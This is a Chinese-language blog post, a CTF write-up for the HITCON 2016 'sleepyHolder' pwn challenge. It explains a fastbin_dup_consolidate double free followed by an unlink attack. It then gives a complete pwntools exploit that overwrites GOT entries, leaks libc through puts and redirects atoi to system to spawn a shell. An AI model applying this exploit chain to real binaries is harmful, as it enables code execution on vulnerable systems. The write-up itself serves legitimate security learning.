sleepyHolder_hitcon_2016

最新推荐文章于 2023-06-04 12:05:50 发布
最新推荐文章于 2023-06-04 12:05:50 发布
阅读量369 收藏 1
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124061275
版权

sleepyHolder_hitcon_2016

查看保护
在这里插入图片描述
一个简单题目

在这里插入图片描述
这里没有清掉
攻击思路:利用fastbin_dup_consolidate这个手法实现double free。然后利用unlink攻击,改got为system发送sh即可getshell。
创建1和2类型的堆块,此时释放1,1会进fastbin。接下来申请3类型的堆,因为特别大所以1会进smallbin,此时再次释放1,就可以形成double free,申请回来1个1类型,会发现2的标志位还是0,所以可以使用unlink攻击来getshell。利用方法还挺简单的可以看z1r0’s blog,笔者blog里面讲了unlink和fastbin_dup_consolidate。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27426)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '3. Renew secret\n'

def add(index, content):
   r.sendlineafter(menu, '1')
   r.sendlineafter('What secret do you want to keep?', str(index))
   r.sendafter('Tell me your secret:', content)
 
def delete(index):
   r.sendlineafter(menu, '2')
   r.sendlineafter('Which Secret do you want to wipe?',str(index))
 
def edit(index, content):
   r.sendlineafter(menu, '3')
   r.sendlineafter('Which Secret do you want to renew?', str(index))
   r.sendafter('Tell me your secret:', content)

add(1, 'aaaa')
add(2, 'bbbb')

delete(1)
add(3, 'cccc')

delete(1)

add(1, 'aaaa')
heap_list = 0x6020D0

fd = heap_list - 0x18
bk = heap_list - 0x10

p1 = p64(0) + p64(0x21) + p64(fd) + p64(bk) + p64(0x20)
edit(1, p1)

delete(2)

free_got = elf.got['free']

p2 = p64(0) + p64(elf.got["free"]) + p64(0) + p64(0x6020C0) + p32(1) + p32(1) + p32(1)
edit(1, p2)

edit(2, p64(elf.plt["puts"]))
edit(1, p64(elf.got["puts"]))

delete(2)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('[+] puts_addr = ' + hex(puts_addr))

libc = ELF('./2.23/libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']

one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base

atoi_got = elf.got['atoi']
system_addr = libc_base + libc.sym['system']
edit(1, p64(atoi_got) + p64(0) + p64(0x6020C0) + p32(1) * 3)
edit(2, p64(system_addr))

r.sendline('sh\x00')

r.interactive()
z1r0.
关注
专栏目录
houseoforange_hitcon_2016
fayinq的博客
04-07 274
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1589
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
sleepyHolder_hitcon_2016(fastbin的检查机制+malloc_consolidate+double free)
seaaseesa的博客
04-30 1050
sleepyHolder_hitcon_2016 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能没有清空指针,并且也没有校验,因此可以double free。 Edit功能又验证标志,因此不能UAF编辑 Add功能可以创建三种规格的堆。 由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。但是不能溢出, 而要想成功d...
2016 HITCON CTF SleepyHolder
Bill
04-22 1741
2016 HITCON CTF SleepyHolder 序言 本来这周准备学习House_Of_Orange, 但是这个牵扯知识点太多. 忽然发现还有一个fastbin_dup_consolidate没有学习, 补一下. 程序运行(文章尾部有程序源码) 1. MENU 1. Keep secret 2. Wipe secret 3. Renew secret 2....
Hitcon 2016 SleepyHolder-fastbin_dup_consolidate
九层台
03-08 452
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #define BASE 4...
Hitcon 2016 SleepyHolder-fastbin_dup_consolidate.c
个人笔记
06-04 243
参考/题目下载:1,三联保护:基本都开了功能:0、唤醒功能;1、创建-secret:Big secret;2、清除-secret;3、修改-secret;2,IDA分析功能主函数:清除功能-free:这四个指针都是BSS段的地址。问题点:未检查free的指针是否为空;free后指针未至置为0;导致:可以double free而要想成功double free,仅一个fastbin的chunk不行。
(unlink) HITCON CTF 2016 : Sleepy Holder
qq_36918532的博客
01-20 342
今天仍然是复习unlink的原理和利用过程 这个跟Secret Holder类似的,只不过huge secret一旦创建就无法删除了和修改了(我之前写payload时候忘记了,还delete(3)。。。) 安全检查之后拖到IDA里面:菜单题 free功能好像没什么毛病 修改功能好像也没什么问题(难道问题在分配里面) 看到分配功能,也就是三个秘密分配,也没有什么分配函数读取越界溢出,或者off-by-null漏洞 然后大致只得到了,分配通过flag的位置是否为1,来判断的并且其相对的布局分别是 0x602
[fast_bin_consoli + unlink]sleepyHolder_hitcon_2016
huzai9527的博客
05-25 107
[fast_bin_consoli + unlink]sleepyHolder_hitcon_2016 1. ida分析 add函数 delete函数 unlink 需要控制的全局指针的位置 2. 思路 先申请两个small和big chunk,释放small chunk,申请huge chunk,触发consolidate,再次释放small chunk,触发double free 申请small chunk,同时构造fake chunk,释放big chunk,触发unlin
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
2014 HITCON stkof writeup
Morphy_Amo的博客
01-24 2113
文章目录writeup 题目链接 1、查看安全策略 root@kali:~/ctf/Other/pwn/heap# checksec stkof [*] '/root/ctf/Other/pwn/heap/stkof' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 可以看
unlink-sleepyholder
csdn546229768的博客
01-14 251
unlink(sleepyholder) 题目: hitconctf2016_sleepy_holder(就是进阶版的hitconctf2016_secret_holder) 函数分析: add update dele 总结 : 程序很简单,可以malloc三种类型的chunk,fast chunk \ large chunk \ large chunk(mmap()分配),明显的漏洞有uaf漏洞\double free漏洞,值的注意的是huge_chunk在被创建后就不能修改和删除了 往往简单的一
一个漂亮的毕业设计模板
10-01
一个漂亮的毕业设计模板,供参考学习毕业设计写作技巧
朴素贝叶斯分类器对THUCNews数据集进行新闻分类_naive_bayes.zip
10-01
朴素贝叶斯分类器对THUCNews数据集进行新闻分类_naive_bayes
基于Java语言开发的ktapis风控系统设计源码
10-01
本项目为基于Java语言构建的ktapis风控系统设计源码,包含32个文件,涵盖18个Java源文件、6个XML配置文件、3个Markdown文件、1个Git忽略文件、1个属性文件、1个证书文件、1个JSON文件、1个密钥文件,旨在提供全面的风控解决方案。
基于ssm的旅游网站的设计与实现.zip
10-01
基于ssm的旅游网站的设计与实现
用MATLAB实现的简单基元检测处理,包括sobel算子边缘检测,SUSAN角点检测(非极大值抑制)_
10-01
用MATLAB实现的简单基元检测处理,包括sobel算子边缘检测,SUSAN角点检测(非极大值抑制)_Primitive-detection-MATLAB
基于微信小程序的奶茶点餐小程序的开题报告.docx
最新发布
10-01
基于微信小程序的奶茶点餐小程序的开题报告.docx
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值